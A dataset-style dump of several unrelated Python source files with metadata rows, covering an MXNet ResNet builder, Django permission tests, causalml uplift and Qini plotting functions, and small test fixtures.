bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
num_group = 32
#print('in unit3')
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
conv1 = Conv(data=bn1, num_group=num_group, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act1 = Act(data=bn2, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_group=num_group, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
act2 = Act(data=bn3, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn4 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn4, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn4 = mx.symbol.broadcast_mul(bn4, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return bn4 + shortcut
def residual_unit(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
uv = kwargs.get('version_unit', 3)
version_input = kwargs.get('version_input', 1)
if uv==1:
if version_input==0:
return residual_unit_v1(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
else:
return residual_unit_v1_L(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
elif uv==2:
return residual_unit_v2(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
elif uv==4:
return residual_unit_v4(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
else:
return residual_unit_v3(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs)
def resnet(units, num_stages, filter_list, num_classes, bottle_neck):
bn_mom = config.bn_mom
workspace = config.workspace
kwargs = {'version_se' : config.net_se,
'version_input': config.net_input,
'version_output': config.net_output,
'version_unit': config.net_unit,
'version_act': config.net_act,
'bn_mom': bn_mom,
'workspace': workspace,
'memonger': config.memonger,
}
"""Return ResNet symbol of
Parameters
----------
units : list
Number of units in each stage
num_stages : int
Number of stage
filter_list : list
Channel size of each stage
num_classes : int
Ouput size of symbol
dataset : str
Dataset type, only cifar10 and imagenet supports
workspace : int
Workspace used in convolution operator
"""
version_se = kwargs.get('version_se', 1)
version_input = kwargs.get('version_input', 1)
assert version_input>=0
version_output = kwargs.get('version_output', 'E')
fc_type = version_output
version_unit = kwargs.get('version_unit', 3)
act_type = kwargs.get('version_act', 'prelu')
memonger = kwargs.get('memonger', False)
print(version_se, version_input, version_output, version_unit, act_type, memonger)
num_unit = len(units)
assert(num_unit == num_stages)
data = mx.sym.Variable(name='data')
if version_input==0:
#data = mx.sym.BatchNorm(data=data, fix_gamma=True, eps=2e-5, momentum=bn_mom, name='bn_data')
data = mx.sym.identity(data=data, name='id')
data = data-127.5
data = data*0.0078125
body = Conv(data=data, num_filter=filter_list[0], kernel=(7, 7), stride=(2,2), pad=(3, 3),
no_bias=True, name="conv0", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')
body = Act(data=body, act_type=act_type, name='relu0')
#body = mx.sym.Pooling(data=body, kernel=(3, 3), stride=(2,2), pad=(1,1), pool_type='max')
elif version_input==2:
data = mx.sym.BatchNorm(data=data, fix_gamma=True, eps=2e-5, momentum=bn_mom, name='bn_data')
body = Conv(data=data, num_filter=filter_list[0], kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, name="conv0", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')
body = Act(data=body, act_type=act_type, name='relu0')
else:
data = mx.sym.identity(data=data, name='id')
data = data-127.5
data = data*0.0078125
body = data
body = Conv(data=body, num_filter=filter_list[0], kernel=(7,7), stride=(2,2), pad=(1, 1),
no_bias=True, name="conv0", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')
body = Act(data=body, act_type=act_type, name='relu0')
for i in range(num_stages):
#if version_input==0:
# body = residual_unit(body, filter_list[i+1], (1 if i==0 else 2, 1 if i==0 else 2), False,
# name='stage%d_unit%d' % (i + 1, 1), bottle_neck=bottle_neck, **kwargs)
#else:
# body = residual_unit(body, filter_list[i+1], (2, 2), False,
# name='stage%d_unit%d' % (i + 1, 1), bottle_neck=bottle_neck, **kwargs)
body = residual_unit(body, filter_list[i+1], (2, 2), False,
name='stage%d_unit%d' % (i + 1, 1), bottle_neck=bottle_neck, **kwargs)
for j in range(units[i]-1):
body = residual_unit(body, filter_list[i+1], (1,1), True, name='stage%d_unit%d' % (i+1, j+2),
bottle_neck=bottle_neck, **kwargs)
if bottle_neck:
body = Conv(data=body, num_filter=512, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, name="convd", workspace=workspace)
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bnd')
body = Act(data=body, act_type=act_type, name='relud')
fc1 = symbol_utils.get_fc1(body, num_classes, fc_type)
return fc1
def get_symbol():
"""
Adapted from https://github.com/tornadomeet/ResNet/blob/master/train_resnet.py
Original author Wei Wu
"""
num_classes = config.emb_size
num_layers = config.num_layers
if num_layers >= 500:
filter_list = [64, 256, 512, 1024, 2048]
bottle_neck = True
else:
filter_list = [64, 64, 128, 256, 512]
bottle_neck = False
num_stages = 4
if num_layers == 18:
units = [2, 2, 2, 2]
elif num_layers == 34:
units = [3, 4, 6, 3]
elif num_layers == 49:
units = [3, 4, 14, 3]
elif num_layers == 50:
units = [3, 4, 14, 3]
elif num_layers == 74:
units = [3, 6, 24, 3]
elif num_layers == 90:
units = [3, 8, 30, 3]
elif num_layers == 98:
units = [3, 4, 38, 3]
elif num_layers == 99:
units = [3, 8, 35, 3]
elif num_layers == 100:
units = [3, 13, 30, 3]
elif num_layers == 134:
units = [3, 10, 50, 3]
elif num_layers == 136:
units = [3, 13, 48, 3]
elif num_layers == 140:
units = [3, 15, 48, 3]
elif num_layers == 124:
units = [3, 13, 40, 5]
elif num_layers == 160:
units = [3, 24, 49, 3]
elif num_layers == 101:
units = [3, 4, 23, 3]
elif num_layers == 152:
units = [3, 8, 36, 3]
elif num_layers == 200:
units = [3, 24, 36, 3]
elif num_layers == 269:
units = [3, 30, 48, 8]
else:
raise ValueError("no experiments done on num_layers {}, you can do it yourself".format(num_layers))
net = resnet(units = units,
num_stages = num_stages,
filter_list = filter_list,
num_classes = num_classes,
bottle_neck = bottle_neck)
if config.memonger:
dshape = (config.per_batch_size, config.image_shape[2], config.image_shape[0], config.image_shape[1])
net_mem_planned = memonger.search_plan(net, data=dshape)
old_cost = memonger.get_cost(net, data=dshape)
new_cost = memonger.get_cost(net_mem_planned, data=dshape)
print('Old feature map cost=%d MB' % old_cost)
print('New feature map cost=%d MB' % new_cost)
net = net_mem_planned
return net
| 50.645609 | 119 | 0.610301 | 4,656 | 32,869 | 4.131229 | 0.075172 | 0.0549 | 0.023395 | 0.037432 | 0.822771 | 0.804367 | 0.795581 | 0.786899 | 0.784507 | 0.77229 | 0 | 0.041585 | 0.255225 | 32,869 | 648 | 120 | 50.723765 | 0.744159 | 0.135416 | 0 | 0.647191 | 0 | 0 | 0.059522 | 0 | 0 | 0 | 0 | 0 | 0.006742 | 1 | 0.022472 | false | 0 | 0.024719 | 0 | 0.08764 | 0.008989 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a1110f3dc64ccdaef7a1555b9cbcf9cf6d139ec | 2,519 | py | Python | isic/core/tests/test_permissions.py | ImageMarkup/isic | 607b2b103d0d2a67adb61f8ea88f1461c85ec8f3 | [
"Apache-2.0"
] | null | null | null | isic/core/tests/test_permissions.py | ImageMarkup/isic | 607b2b103d0d2a67adb61f8ea88f1461c85ec8f3 | [
"Apache-2.0"
] | 18 | 2021-06-10T05:14:34.000Z | 2022-03-22T02:15:59.000Z | isic/core/tests/test_permissions.py | ImageMarkup/isic | 607b2b103d0d2a67adb61f8ea88f1461c85ec8f3 | [
"Apache-2.0"
] | null | null | null | from django.urls.base import reverse
import pytest
from pytest_django.asserts import assertQuerysetEqual
@pytest.mark.django_db
def test_core_stats(client):
r = client.get(reverse('core/stats'))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_api_stats(client):
r = client.get(reverse('core/api/stats'))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_staff_list(client, authenticated_client, staff_client):
r = client.get(reverse('core/staff-list'))
assert r.status_code == 302
r = authenticated_client.get(reverse('core/staff-list'))
assert r.status_code == 403
r = staff_client.get(reverse('core/staff-list'))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_collection_list(client, authenticated_client, staff_client, private_collection):
r = client.get(reverse('core/collection-list'))
assertQuerysetEqual(r.context['collections'].object_list, [])
r = authenticated_client.get(reverse('core/collection-list'))
assertQuerysetEqual(r.context['collections'].object_list, [])
r = staff_client.get(reverse('core/collection-list'))
assertQuerysetEqual(r.context['collections'].object_list, [private_collection])
@pytest.mark.django_db
def test_core_collection_detail(client, authenticated_client, staff_client, private_collection):
r = client.get(reverse('core/collection-detail', args=[private_collection.pk]))
assert r.status_code == 302
r = authenticated_client.get(reverse('core/collection-detail', args=[private_collection.pk]))
assert r.status_code == 403
r = staff_client.get(reverse('core/collection-detail', args=[private_collection.pk]))
assert r.status_code == 200
@pytest.mark.django_db
def test_core_collection_detail_filters_contributors(
client, authenticated_client, staff_client, public_collection, image_factory
):
image = image_factory(public=True)
public_collection.images.add(image)
r = client.get(reverse('core/collection-detail', args=[public_collection.pk]))
assert r.status_code == 200
assert list(r.context['contributors']) == []
r = authenticated_client.get(reverse('core/collection-detail', args=[public_collection.pk]))
assert r.status_code == 200
assert list(r.context['contributors']) == []
r = staff_client.get(reverse('core/collection-detail', args=[public_collection.pk]))
assert r.status_code == 200
assert list(r.context['contributors']) == [image.accession.cohort.contributor]
| 35.478873 | 97 | 0.745137 | 332 | 2,519 | 5.445783 | 0.141566 | 0.06969 | 0.123894 | 0.154867 | 0.859513 | 0.839602 | 0.814712 | 0.753319 | 0.752765 | 0.714602 | 0 | 0.014952 | 0.123859 | 2,519 | 70 | 98 | 35.985714 | 0.804259 | 0 | 0 | 0.42 | 0 | 0 | 0.131004 | 0.052402 | 0 | 0 | 0 | 0 | 0.36 | 1 | 0.12 | false | 0 | 0.06 | 0 | 0.18 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a3a1a84f8c5fe040e093def84496da5d902ecf3 | 15,828 | py | Python | causalml/metrics/visualize.py | LeihuaYe/causalml | 900df2de0e5a3e999c290f5849c2cb3367f5ad5a | [
"Apache-2.0"
] | 1 | 2019-12-29T03:05:10.000Z | 2019-12-29T03:05:10.000Z | causalml/metrics/visualize.py | CZZLEGEND/causalml | 900df2de0e5a3e999c290f5849c2cb3367f5ad5a | [
"Apache-2.0"
] | null | null | null | causalml/metrics/visualize.py | CZZLEGEND/causalml | 900df2de0e5a3e999c290f5849c2cb3367f5ad5a | [
"Apache-2.0"
] | null | null | null | from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
plt.style.use('fivethirtyeight')
sns.set_palette("Paired")
RANDOM_COL = 'Random'
def plot(df, kind='gain', n=100, figsize=(8, 8), *args, **kwarg):
"""Plot one of the lift/gain/Qini charts of model estimates.
A factory method for `plot_lift()`, `plot_gain()` and `plot_qini()`. For details, pleas see docstrings of each
function.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns.
kind (str, optional): the kind of plot to draw. 'lift', 'gain', and 'qini' are supported.
n (int, optional): the number of samples to be used for plotting.
"""
catalog = {'lift': get_cumlift,
'gain': get_cumgain,
'qini': get_qini}
assert kind in catalog.keys(), '{} plot is not implemented. Select one of {}'.format(kind, catalog.keys())
df = catalog[kind](df, *args, **kwarg)
if (n is not None) and (n < df.shape[0]):
df = df.iloc[np.linspace(0, df.index[-1], n, endpoint=True)]
df.plot(figsize=figsize)
plt.xlabel('Population')
plt.ylabel('{}'.format(kind.title()))
def get_cumlift(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
random_seed=42):
"""Get average uplifts of model estimates in cumulative population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the mean of the true treatment effect in each of cumulative population.
Otherwise, it's calculated as the difference between the mean outcomes of the
treatment and control groups in each of cumulative population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
random_seed (int, optional): random seed for numpy.random.rand()
Returns:
(pandas.DataFrame): average uplifts of model estimates in cumulative population
"""
assert ((outcome_col in df.columns) and (treatment_col in df.columns) or
treatment_effect_col in df.columns)
df = df.copy()
np.random.seed(random_seed)
random_cols = []
for i in range(10):
random_col = '__random_{}__'.format(i)
df[random_col] = np.random.rand(df.shape[0])
random_cols.append(random_col)
model_names = [x for x in df.columns if x not in [outcome_col, treatment_col,
treatment_effect_col]]
lift = []
for i, col in enumerate(model_names):
df = df.sort_values(col, ascending=False).reset_index(drop=True)
df.index = df.index + 1
if treatment_effect_col in df.columns:
# When treatment_effect_col is given, use it to calculate the average treatment effects
# of cumulative population.
lift.append(df[treatment_effect_col].cumsum() / df.index)
else:
# When treatment_effect_col is not given, use outcome_col and treatment_col
# to calculate the average treatment_effects of cumulative population.
df['cumsum_tr'] = df[treatment_col].cumsum()
df['cumsum_ct'] = df.index.values - df['cumsum_tr']
df['cumsum_y_tr'] = (df[outcome_col] * df[treatment_col]).cumsum()
df['cumsum_y_ct'] = (df[outcome_col] * (1 - df[treatment_col])).cumsum()
lift.append(df['cumsum_y_tr'] / df['cumsum_tr'] - df['cumsum_y_ct'] / df['cumsum_ct'])
lift = pd.concat(lift, join='inner', axis=1)
lift.loc[0] = np.zeros((lift.shape[1], ))
lift = lift.sort_index().interpolate()
lift.columns = model_names
lift[RANDOM_COL] = lift[random_cols].mean(axis=1)
lift.drop(random_cols, axis=1, inplace=True)
return lift
def get_cumgain(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42):
"""Get cumulative gains of model estimates in population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
Returns:
(pandas.DataFrame): cumulative gains of model estimates in population
"""
lift = get_cumlift(df, outcome_col, treatment_col, treatment_effect_col, random_seed)
# cumulative gain = cumulative lift x (# of population)
gain = lift.mul(lift.index.values, axis=0)
if normalize:
gain = gain.div(gain.iloc[-1, :], axis=1)
return gain
def get_qini(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42):
"""Get Qini of model estimates in population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Radcliffe (2007), `Using Control Group to Target on Predicted Lift:
Building and Assessing Uplift Models`
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
Returns:
(pandas.DataFrame): cumulative gains of model estimates in population
"""
assert ((outcome_col in df.columns) and (treatment_col in df.columns) or
treatment_effect_col in df.columns)
df = df.copy()
np.random.seed(random_seed)
random_cols = []
for i in range(10):
random_col = '__random_{}__'.format(i)
df[random_col] = np.random.rand(df.shape[0])
random_cols.append(random_col)
model_names = [x for x in df.columns if x not in [outcome_col, treatment_col,
treatment_effect_col]]
qini = []
for i, col in enumerate(model_names):
df = df.sort_values(col, ascending=False).reset_index(drop=True)
df.index = df.index + 1
df['cumsum_tr'] = df[treatment_col].cumsum()
if treatment_effect_col in df.columns:
# When treatment_effect_col is given, use it to calculate the average treatment effects
# of cumulative population.
l = df[treatment_effect_col].cumsum() / df.index * df['cumsum_tr']
else:
# When treatment_effect_col is not given, use outcome_col and treatment_col
# to calculate the average treatment_effects of cumulative population.
df['cumsum_ct'] = df.index.values - df['cumsum_tr']
df['cumsum_y_tr'] = (df[outcome_col] * df[treatment_col]).cumsum()
df['cumsum_y_ct'] = (df[outcome_col] * (1 - df[treatment_col])).cumsum()
l = df['cumsum_y_tr'] - df['cumsum_y_ct'] * df['cumsum_tr'] / df['cumsum_ct']
qini.append(l)
qini = pd.concat(qini, join='inner', axis=1)
qini.loc[0] = np.zeros((qini.shape[1], ))
qini = qini.sort_index().interpolate()
qini.columns = model_names
qini[RANDOM_COL] = qini[random_cols].mean(axis=1)
qini.drop(random_cols, axis=1, inplace=True)
if normalize:
qini = qini.div(qini.iloc[-1, :], axis=1)
return qini
def plot_gain(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42, n=100, figsize=(8, 8)):
"""Plot the cumulative gain chart (or uplift curve) of model estimates.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
n (int, optional): the number of samples to be used for plotting
"""
plot(df, kind='gain', n=n, figsize=figsize, outcome_col=outcome_col, treatment_col=treatment_col,
treatment_effect_col=treatment_effect_col, normalize=normalize, random_seed=random_seed)
def plot_lift(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
random_seed=42, n=100, figsize=(8, 8)):
"""Plot the lift chart of model estimates in cumulative population.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the mean of the true treatment effect in each of cumulative population.
Otherwise, it's calculated as the difference between the mean outcomes of the
treatment and control groups in each of cumulative population.
For details, see Section 4.1 of Gutierrez and G{\'e}rardy (2016), `Causal Inference
and Uplift Modeling: A review of the literature`.
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
random_seed (int, optional): random seed for numpy.random.rand()
n (int, optional): the number of samples to be used for plotting
"""
plot(df, kind='lift', n=n, figsize=figsize, outcome_col=outcome_col, treatment_col=treatment_col,
treatment_effect_col=treatment_effect_col, random_seed=random_seed)
def plot_qini(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau',
normalize=False, random_seed=42, n=100, figsize=(8, 8)):
"""Plot the Qini chart (or uplift curve) of model estimates.
If the true treatment effect is provided (e.g. in synthetic data), it's calculated
as the cumulative gain of the true treatment effect in each population.
Otherwise, it's calculated as the cumulative difference between the mean outcomes
of the treatment and control groups in each population.
For details, see Radcliffe (2007), `Using Control Group to Target on Predicted Lift:
Building and Assessing Uplift Models`
For the former, `treatment_effect_col` should be provided. For the latter, both
`outcome_col` and `treatment_col` should be provided.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
random_seed (int, optional): random seed for numpy.random.rand()
n (int, optional): the number of samples to be used for plotting
"""
plot(df, kind='qini', n=n, figsize=figsize, outcome_col=outcome_col, treatment_col=treatment_col,
treatment_effect_col=treatment_effect_col, normalize=normalize, random_seed=random_seed)
def auuc_score(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau', normalize=True):
"""Calculate the AUUC (Area Under the Uplift Curve) score.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
Returns:
(float): the AUUC score
"""
cumgain = get_cumgain(df, outcome_col, treatment_col, treatment_effect_col, normalize)
return cumgain.sum() / cumgain.shape[0]
def qini_score(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau', normalize=True):
"""Calculate the Qini score: the area between the Qini curves of a model and random.
For details, see Radcliffe (2007), `Using Control Group to Target on Predicted Lift:
Building and Assessing Uplift Models`
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
Returns:
(float): the Qini score
"""
qini = get_qini(df, outcome_col, treatment_col, treatment_effect_col, normalize)
return (qini.sum(axis=0) - qini[RANDOM_COL].sum()) / qini.shape[0]
| 46.011628 | 114 | 0.688148 | 2,298 | 15,828 | 4.618799 | 0.086162 | 0.089033 | 0.072923 | 0.03844 | 0.875636 | 0.860467 | 0.853966 | 0.831826 | 0.822593 | 0.822593 | 0 | 0.009812 | 0.220874 | 15,828 | 343 | 115 | 46.145773 | 0.850876 | 0.578153 | 0 | 0.436364 | 0 | 0 | 0.061422 | 0 | 0 | 0 | 0 | 0 | 0.027273 | 1 | 0.081818 | false | 0 | 0.036364 | 0 | 0.163636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a4b31ceac3c808a44db96d402dab6e0defd6a9a | 20 | py | Python | virtual/lib/python3.6/site-packages/pylint/test/regrtest_data/wildcard.py | drewheathens/The-Moringa-Tribune | 98ee4d63c9df6f1f7497fc6876960a822d914500 | [
"MIT"
] | 463 | 2015-01-15T08:17:42.000Z | 2022-03-28T15:10:20.000Z | virtual/lib/python3.6/site-packages/pylint/test/regrtest_data/wildcard.py | drewheathens/The-Moringa-Tribune | 98ee4d63c9df6f1f7497fc6876960a822d914500 | [
"MIT"
] | 52 | 2015-01-06T02:43:59.000Z | 2022-03-14T11:15:21.000Z | virtual/lib/python3.6/site-packages/pylint/test/regrtest_data/wildcard.py | drewheathens/The-Moringa-Tribune | 98ee4d63c9df6f1f7497fc6876960a822d914500 | [
"MIT"
] | 249 | 2015-01-07T22:49:49.000Z | 2022-03-18T02:32:06.000Z | from empty import *
| 10 | 19 | 0.75 | 3 | 20 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 20 | 1 | 20 | 20 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a5ea175f297869f9ed46e6e0b9d5f17eaf5f804 | 89 | py | Python | src/python/stup/ring/__init__.py | Wizmann/STUP-Protocol | e06a3442082e5061d2be32be3ffd681675e7ffb5 | [
"MIT"
] | 14 | 2017-05-06T10:14:32.000Z | 2018-07-17T02:58:00.000Z | src/python/stup/ring/__init__.py | Wizmann/STUP-Protocol | e06a3442082e5061d2be32be3ffd681675e7ffb5 | [
"MIT"
] | 2 | 2017-06-13T05:40:18.000Z | 2017-06-13T16:23:01.000Z | src/python/stup/ring/__init__.py | Wizmann/STUP-Protocol | e06a3442082e5061d2be32be3ffd681675e7ffb5 | [
"MIT"
] | 4 | 2017-06-09T20:20:54.000Z | 2018-07-17T02:58:10.000Z | #coding=utf-8
from .buffer import *
from .window import *
from .container.item import *
| 14.833333 | 29 | 0.730337 | 13 | 89 | 5 | 0.692308 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013333 | 0.157303 | 89 | 5 | 30 | 17.8 | 0.853333 | 0.134831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ab1deccf00c19cf05eafb4ebc9e32a689914006 | 152 | py | Python | mayan/apps/folders/tests/literals.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | 1 | 2020-07-15T02:56:02.000Z | 2020-07-15T02:56:02.000Z | mayan/apps/folders/tests/literals.py | kyper999/mayan-edms | ca7b8301a1f68548e8e718d42a728a500d67286e | [
"Apache-2.0"
] | null | null | null | mayan/apps/folders/tests/literals.py | kyper999/mayan-edms | ca7b8301a1f68548e8e718d42a728a500d67286e | [
"Apache-2.0"
] | 2 | 2020-02-24T21:02:31.000Z | 2021-01-05T23:52:01.000Z | from __future__ import absolute_import, unicode_literals
TEST_FOLDER_LABEL = 'test folder label'
TEST_FOLDER_EDITED_LABEL = 'test folder edited label'
| 30.4 | 56 | 0.842105 | 21 | 152 | 5.571429 | 0.47619 | 0.34188 | 0.384615 | 0.324786 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111842 | 152 | 4 | 57 | 38 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0.269737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
